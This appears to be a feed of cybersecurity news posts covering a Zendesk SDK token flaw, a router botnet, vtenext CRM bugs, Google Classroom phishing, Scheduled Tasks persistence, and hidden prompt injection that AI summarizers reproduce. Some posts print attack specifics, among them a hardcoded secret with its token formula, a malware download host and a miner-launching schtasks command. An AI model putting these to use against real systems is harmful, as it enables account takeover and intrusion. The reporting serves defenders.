• A critical security vulnerability has been discovered in Zendesk’s Android SDK implementation that allows attackers to perform mass account takeovers without any user interaction. 

    The flaw, which earned a $3,000 bug bounty payout, stems from predictable token generation mechanisms that enable unauthorized access to all Zendesk support tickets across affected organizations.

    Key Takeaways
    1. Predictable JWT tokens in Zendesk’s Android SDK allow zero-click account takeovers.
    2. Attackers can mass-generate tokens without rate limits to access all tickets and data.
    3. Fix by using high-entropy secrets, enforcing rate limits, and auditing mobile auth.

    The vulnerability exploits a fundamental weakness in how the Zendesk Android SDK generates authentication tokens, combining hardcoded secrets with sequential account IDs to create predictable JWT tokens. 

    This design flaw allows malicious actors to systematically generate valid authentication tokens for any user account without requiring any form of user interaction or social engineering.

    Account Takeover Vulnerability

    Voorivex’s Team reports that the vulnerability lies within the ZendeskHelper.g() method, which implements a flawed token generation algorithm. The method creates authentication tokens using a predictable formula:

    Zendesk Account Takeover Vulnerability

    The token generation process follows these steps:

    • Base String Construction: REDACTED-{AccountID}-{HardcodedSecret}
    • SHA-1 Hash Generation: The base string is processed through SHA-1 hashing
    • Final Token Format: {AccountID}_{SHA1Hash}

    The critical flaw emerges from two key weaknesses: the use of a static hardcoded secret (987sdasdlkjlakdjf) that remains constant across all installations, and sequential account IDs (getRemoteId()) that can be easily enumerated. 

    This combination creates a scenario where attackers can generate valid authentication tokens for any user by simply iterating through account ID ranges.

    The authentication flow sends POST requests to /access/sdk/jwt endpoints:

    Zendesk Account Takeover Vulnerability

    The server responds with a valid access_token that grants full access to the victim’s Zendesk support environment, including the ability to read all tickets, submit new requests, and perform any action available through the support interface.

    The vulnerability enables zero-click mass account takeover attacks through systematic token generation and validation. 

    Attackers can implement automated scripts to iterate through account ID ranges, generate corresponding tokens, and validate them against Zendesk endpoints without triggering rate limiting or account lockout mechanisms.

    Successful exploitation grants attackers access to:

    • Complete ticket histories containing sensitive customer communications
    • Personal identifiable information (PII) within support conversations
    • Internal company communications and support procedures
    • Customer complaint patterns and business intelligence data
    • Ability to impersonate legitimate users in support interactions

    The vulnerability affects any organization using Zendesk’s Android SDK for mobile support integration, potentially impacting thousands of companies worldwide. 

    This critical flaw demonstrates the severe security risks associated with predictable authentication mechanisms and highlights the importance of implementing robust token generation systems and comprehensive security testing throughout the mobile application development lifecycle.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post 0-Click Zendesk Account Takeover Vulnerability Enables Access to all Zendesk Tickets appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A large-scale phishing campaign was conducted by threat actors who abused Google Classroom to distribute over 115,000 malicious emails to more than 13,500 organizations globally.

    The campaign uncovered by Check Point unfolded in five distinct waves between August 6 and August 12, 2025, and weaponized the trusted educational platform to bypass conventional security filters.

    The attack targeted organizations across various industries in North America, Europe, the Middle East, and Asia.

    The effectiveness of the campaign originates from its abuse of a legitimate and trusted service. Attackers created fake “classrooms” and sent invitations from the official no-reply@classroom.google.com email address.

    Because the emails originated from a valid Google domain, they were more likely to bypass security gateways that rely on sender reputation and standard filtering rules.

    Phishing email leveraging Google Classroom
    Phishing email leveraging Google Classroom

    Instead of legitimate educational content, the malicious invitations contained unrelated commercial lures. As seen in samples of the phishing emails, the messages offered services such as SEO optimization or pitches for product reselling, Check Point said in a report shared with Cyber Security News.

    One such lure read, “Hello, we have checked your website and it looks like SEO isn’t working properly… We can rank you in the TOP3 on Google.”

    The ultimate goal was to move the conversation to an unmonitored channel. Each email prompted the recipient to contact the scammers via a WhatsApp phone number, a classic social engineering tactic designed to evade enterprise security controls and lead potential victims into fraud schemes.

    FeatureDescription
    Scale115,000+ phishing emails sent in five waves between August 6–12, 2025.
    Targets13,500+ organizations worldwide across various industries in North America, Europe, the Middle East, and Asia.
    LureFake Google Classroom invitations with commercial offers unrelated to education, such as SEO services or product reselling partnerships.
    Call to ActionDirecting recipients to contact the scammers via a WhatsApp phone number to move the conversation to an unmonitored channel.
    Delivery MethodAbusing the legitimate Google Classroom invitation system to send emails from a trusted Google domain, bypassing traditional email security filters.
    Phishing email leveraging Google Classroom

    The operation demonstrated significant scale and coordination, delivering a high volume of emails in just one week. The use of a widely used collaboration tool like Google Classroom allowed the attackers to reach a broad, multi-sector audience with minimal initial effort.

    To counter such threats, security experts recommend the following measures:

    • Enhance User Training: Educate employees to scrutinize all unexpected invitations, even those from trusted services. The presence of non-contextual commercial offers or requests to communicate via personal messaging apps should be treated as major red flags.
    • Deploy Advanced Threat Prevention: Utilize modern, AI-driven security solutions that can analyze the context and intent of a message, rather than relying solely on sender reputation.
    • Extend Security to Collaboration Tools: Ensure that phishing protection extends beyond email to all cloud-based applications and collaboration platforms used within the organization.

    As attackers continue to innovate, organizations must adopt a multi-layered defense strategy capable of detecting and neutralizing threats that hide in plain sight.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post Hackers Leverage Google Classroom for 115,000+ Phishing Emails Targeting 13,500+ Organizations appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly observed malware campaign has emerged targeting a broad range of network appliances, including routers from DrayTek, TP-Link, Raisecom, and Cisco.

    Throughout July 2025, threat researchers observed a stealthy loader spread by exploiting unauthenticated command injection flaws in embedded web services.

    Initial compromise is achieved through straightforward HTTP requests, which silently deliver a downloader script tailored for each product. Once executed, these scripts fetch and launch the primary payload, granting attackers remote control over vulnerable systems worldwide.

    The malware, dubbed “Gayfemboy” by its discoverers, builds upon the infamous Mirai botnet lineage but introduces significant enhancements in stealth and modularity.

    Its infrastructure has been traced to a consistent download host at 220.158.234.135, while attack traffic originates from 87.121.84.34.

    Payloads are delivered as seemingly innocuous files named after specific device architectures—such as “aalel” for AArch and “xale” for x86-64—to evade signature-based detection.

    Following initial download, the malware proceeds to establish persistence, employing UPX packing with a modified magic header to foil automated unpackers.

    Fortinet analysts noted that the campaign’s global footprint includes targets in Brazil, Mexico, the United States, Germany, France, Switzerland, Israel, and Vietnam, spanning sectors from manufacturing to media.

    The attackers leverage both HTTP and TFTP transports based on device capabilities, ensuring high success rates even in environments with limited outbound connections.

    Analysis of the malware

    Once the loader stages complete, the attacker gains a foothold with full root privileges, enabling further reconnaissance and lateral movement.

    In this report, we delve deeper into the malware’s infection mechanism to shed light on how routine firmware interfaces are weaponized.

    Attackers craft specific URI paths to trigger command injection in router web management panels.

    TP-Link Archer AX21 exploit traffic (Source – Fortinet)

    Here, the unauthenticated endpoint accepts arbitrary shell commands in the country parameter.

    Upon receipt, the targeted router executes a lightweight shell snippet that downloads and executes the architecture-specific binary.

    DrayTek devices exhibit analogous behavior through mainfunction.cgi.

    DrayTek exploit traffic (Source – Fortinet)

    Each staging script follows a consistent pattern: change to a writable directory, fetch the downloader, grant execution permissions, invoke it with a product identifier, and then remove traces.

    Raisecom downloader script (Source – Fortinet)

    By tailoring filenames and parameters to each vendor, the attackers avoid simple pattern matching while streamlining deployment across heterogeneous fleets.

    Continuous monitoring of /proc/[PID]/exe further enables the malware to eliminate competing infections and debugging hooks, solidifying its control over the device.

    This injection-driven infection mechanism underscores the need for rigorous firmware integrity checks and network segmentation to prevent similar botnet campaigns.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New Stealthy Malware Exploiting Cisco, TP-Link and Other Routers to Gain Remote Control appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A comprehensive security analysis of vtenext CRM version 25.02 has revealed multiple critical vulnerabilities that allow unauthenticated attackers to bypass authentication mechanisms through three distinct attack vectors, ultimately leading to remote code execution on target systems. 

    The Italian CRM solution, utilized by numerous small and medium enterprises across Italy, faces significant security exposure despite attempted vendor notifications.

    Key Takeaways
    1. Three authentication bypasses let attackers impersonate any user.
    2. Post‐login, LFI and module‐upload flaws enable remote code execution.
    3. Only the password‐reset issue was silently patched; others still need fixes.

    XSS and Session Hijacking

    Sicuranext reports that the first attack vector exploits a vulnerability chain combining reflected Cross-Site Scripting (XSS), CSRF token bypass, and session cookie disclosure. 

    A critical flaw in modules/Home/HomeWidgetBlockList.php where the widgetId parameter undergoes insufficient sanitization before reflection in server responses.

    The vulnerability manifests when JSON responses containing malicious payloads are delivered with Content-Type: text/html headers instead of the secure application/json format, enabling browser execution of embedded JavaScript code. 

    Attackers can inject malicious scripts using crafted requests:

    vtenext-vulnerabilities

    The exploitation becomes particularly dangerous when combined with a CSRF token validation bypass achieved through HTTP method tampering. 

    The application’s reliance on the $_REQUEST superglobal allows attackers to convert POST requests to GET requests, completely circumventing CSRF protection mechanisms in include/utils/VteCsrf.php.

    vtenext-vulnerabilities

    This design flaw enables attackers to exploit XSS vulnerabilities without requiring valid CSRF tokens, significantly lowering the attack complexity.

    SQL Injection Vulnerability

    The second authentication bypass vector leverages SQL injection vulnerabilities in modules/Fax/EditView.php to extract sensitive user credentials and authentication tokens. 

    The vulnerable code constructs database queries by directly concatenating user-controlled input:

    vtenext-vulnerabilities

    Although prepared statements are utilized, the $fieldname parameter remains unsanitized, allowing attackers to specify arbitrary database columns for extraction. 

    More critically, attackers can leverage subquery injection to extract password reset tokens.

    These extracted tokens enable immediate password reset operations without user interaction, providing complete account takeover capabilities.

    Direct Password Reset Vulnerability

    The most severe vulnerability, designated as the third attack vector, involves an arbitrary password reset flaw in hub/rpwd.php. 

    This endpoint exposes a change_password action that lacks adequate security validation, permitting password modification for any user account using only the target username.

    The vulnerable code path in modules/Users/RecoverPwd.php processes password change requests without proper authentication verification:

    vtenext-vulnerabilities

    The skipOldPwdCheck parameter set to true completely bypasses password verification, enabling attackers to reset any user’s credentials through a single HTTP request. This vulnerability was patched in version 25.02.1 following the research disclosure.

    Remote Code Execution Flaw

    Once authentication bypass is achieved, attackers can escalate to remote code execution through various techniques. 

    The application contains multiple Local File Inclusion (LFI) vulnerabilities that accept user input in file inclusion functions without proper sanitization.

    Critical LFI vulnerabilities exist in:

    • modules/Settings/LayoutBlockListUtils.php
    • modules/Calendar/ActivityAjax.php
    • modules/Calendar/wdCalendar.php

    Path traversal sequences (../) enable arbitrary file inclusion, with the limitation that target files must possess .php extensions. 

    While upload restrictions prevent direct PHP file uploads, researchers demonstrated RCE exploitation through pearcmd.php gadgets when the PEAR framework is present on target systems.

    Additionally, vtenext administrators can upload custom modules through the ModuleManager interface, providing a direct pathway to RCE. 

    Organizations utilizing vtenext CRM should immediately upgrade to version 25.02.1 or later and implement additional security measures to mitigate these critical vulnerabilities. 

    The vendor’s delayed response to responsible disclosure attempts highlights the importance of proactive security monitoring and rapid patch deployment in enterprise environments.

    Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.

    The post Multiple vtenext Vulnerabilities Let Attackers Bypass Authentication and Execute Remote Codes appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Only 7 days left to secure the Early Bird registration at the OpenSSL Conference 2025, October 7 – 9 in Prague.  The event will bring together lawyers, regulators, developers, and entrepreneurs to explore issues of security and privacy for everyone, everywhere. Attendees will have the opportunity to: Early Bird pricing closes in 7 days. [REGISTRATION […]

    The post Only 7 Days Left for Early Bird Registration to the OpenSSL Conference 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical zero-click vulnerability in Zendesk’s Android SDK has been uncovered, enabling attackers to hijack support accounts and harvest every ticket without any user interaction. Discovered during a private bug bounty program, the flaw stems from weak token generation and storage mechanisms within Zendesk’s mobile application. Vulnerability Overview Zendesk’s Android client generates authentication tokens by […]

    The post 0-Click Zendesk Flaw Lets Hackers Hijack Accounts and View All Tickets appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Dover, DE, United States, August 25th, 2025, CyberNewsWire Attaxion announces the addition of the Agentless Traffic Monitoring capability to its exposure management platform. Agentless Traffic Monitoring is a new capability designed to give cybersecurity teams actionable visibility into network traffic flowing to and from their digital assets – all without the need to deploy any agents or sensors […]

    The post Attaxion Releases Agentless Traffic Monitoring for Immediate Risk Prioritization appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Dover, DE, United States, August 25th, 2025, CyberNewsWire

    Attaxion announces the addition of the Agentless Traffic Monitoring capability to its exposure management platform. Agentless Traffic Monitoring is a new capability designed to give cybersecurity teams actionable visibility into network traffic flowing to and from their digital assets – all without the need to deploy any agents or sensors on these assets.

    Attaxion uses real-time NetFlow data to provide its users with detailed context about inbound and outbound traffic—including source and destination IP addresses and ports, protocol used, and timestamps of when the traffic was first and last seen. Relying on global NetFlow data instead of local sensors allows to preserve the agentless nature of the solution, making sure Attaxion remains easy to use and doesn’t require deployment.

    Using the NetFlow data and a combination of threat intelligence sources, Attaxion can distinguish between benign and malicious traffic, offering SOC analysts and cybersecurity engineers a quick and easy way of understanding which of their IP addresses are communicating with known malicious IP addresses. 

    Figure 1: Attaxion’s new Agentless Traffic Monitoring feature, identifying malicious traffic to and from the organization’s IP addresses

    A diverse set of connected threat intelligence feeds allows Attaxion to highlight the exact type of attack and in some cases even the exact malware family that is generating the traffic.

    The new feature speeds up incident response, malware detection, and threat hunting, and makes vulnerability management much more effective, allowing network administrators and security engineers to focus on what’s relevant right now.

    “With the level of detail that Agentless Traffic Monitoring provides, security teams can immediately see which assets are interacting with known malicious infrastructure,” said Max Beatty, Head of Growth & Strategy at Attaxion, “This context is incredibly valuable when prioritizing risk. If an asset with a known vulnerability is communicating with a malicious IP, that should be your top priority.”

    The Agentless Traffic Monitoring feature is built to help reduce alert fatigue and focus remediation efforts on high-risk areas within the attack surface. 

    Key capabilities include:

    • Real-time traffic visibility across all exposed assets.
    • Automatic classification of malicious traffic and attack type.
    • Integration with threat intelligence feeds to detect attack types and malware families.
    • Asset-level context to support vulnerability prioritization.

    Figure 2: Attaxion’s Agentless Traffic Monitoring identifies recent command-and-control (C2) activity across malware families and timeframes

    Agentless Traffic Monitoring is now available for Attaxion customers as part of its growing suite of continuous monitoring tools.

    For more information, users can visit https://attaxion.com/capability/traffic-monitoring/.

    About Attaxion

    Attaxion helps organizations discover, monitor, and secure their internet-facing assets. The platform combines automated discovery, continuous assessment, and guided remediation to deliver 97% greater asset visibility and AI-driven vulnerability prioritization — making robust cyber defense accessible to teams of every size. To support early evaluation and integration, Attaxion is available with a 30-day free trial and an asset finder preview tool.

    Contact

    PR Team
    Attaxion LLC
    press@attaxion.com

    The post Attaxion Releases Agentless Traffic Monitoring for Immediate Risk Prioritization appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals have unveiled a novel variation of the ClickFix social engineering technique that weaponizes AI-powered summarization tools to stealthily distribute ransomware instructions. By leveraging invisible prompt injection and a “prompt overdose” strategy, attackers embed malicious directives within hidden HTML elements that AI summarizers in email clients, browser extensions, and productivity platforms faithfully reproduce in their […]

    The post Hackers Use AI-Generated Summaries to Deliver Ransomware Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Over the past year, security teams have observed an uptick in adversaries leveraging native Windows Scheduled Tasks to maintain footholds in compromised environments.

    Unlike elaborate rootkits or zero-day exploits, these techniques exploit built-in system functionality, enabling threat actors to persist without deploying additional binaries or complex toolchains.

    By integrating malicious commands directly into Task Scheduler jobs—triggered on boot, logon, or at timed intervals—attackers achieve stealthy, resilient access that often eludes conventional detection mechanisms.

    Initial infections typically begin with phishing emails or exploit kits delivering lightweight loaders that pivot quickly to persistence.

    Once they achieve execution on the endpoint, attackers invoke either the schtasks.exe binary or PowerShell cmdlets to register new tasks or modify existing ones. These jobs may execute under the SYSTEM account, further complicating detection.

    Early samples targeted financial institutions, while more recent campaigns have expanded into critical infrastructure sectors, highlighting the broad applicability and low operational cost of Scheduled Tasks abuse.

    The DFIR Spot analysts noted the malware’s reliance on triggers such as LogonTrigger and TimeTrigger, configured to execute every five minutes or upon each user logon.

    In multiple engagements, Incident Response teams discovered tasks named to mimic legitimate Windows services—such as “TelemetryUpdater” or “HealthCheck”—but pointing to executables stored in unconventional directories under C:\ProgramData\System.

    This approach allows the malicious components to blend into routine system activity, delaying analysis and remediation.

    Subsequent payloads delivered via these tasks range from coin-mining binaries to remote administration tools.

    Once registered, tasks often self-update by invoking PowerShell scripts that pull additional modules or change command-line arguments.

    Because Task Scheduler logs can be cleared or disabled by attackers, many organizations have struggled to reconstruct timelines without enriched EDR telemetry.

    Persistence Tactics: Malicious Task Registration and Execution

    A core persistence mechanism involves the command-line invocation:-

    schtasks /create /sc minute /mo 5 /tn "Microsoft\Windows\Update\TelemetryUpdater" \
    /tr "C:\ProgramData\System\svchost32.exe --url=stratum+tcp://miner.fakepool.local:3333 --user guest" \
    /ru SYSTEM
    Scheduled Task Creation Command (Source – The DFIR Spot)

    In this snippet, the /sc minute /mo 5 parameters dictate a five-minute interval, while the task name and directory structures mimic authentic Windows updates. Attackers frequently choose TimeTrigger elements in the XML task file to specify both start boundaries and indefinite repetition, as in:

    <Triggers>
      <TimeTrigger>
        <StartBoundary>2025-08-17T00:00:00</StartBoundary>
        <Repetition>
          <Interval>PT5M</Interval>
          <StopAtDurationEnd>false</StopAtDurationEnd>
        </Repetition>
      </TimeTrigger>
    </Triggers>
    Malicious Task XML Configuration (Source – The DFIR Spot)

    After creation, the job executes with SYSTEM privileges, launching a loader that contacts a remote C2 or payload repository.

    By embedding the executable in nonstandard paths and abusing native scheduling features, threat actors achieve persistence without requiring additional exploitation frameworks.

    Detection strategies must include rigorous baselining of legitimate scheduled tasks, monitoring TaskScheduler/Operational logs for Event ID 106 (task registered), and enforcing advanced audit policies to capture Event ID 4698 entries.

    Combining these logs with EDR-driven process lineage analysis can reveal anomalous task creation patterns that diverge from normal administrative operations.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Threat Actors Weaponizing Windows Scheduled Tasks to Establish Persistence Without Requiring Extra Tools appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶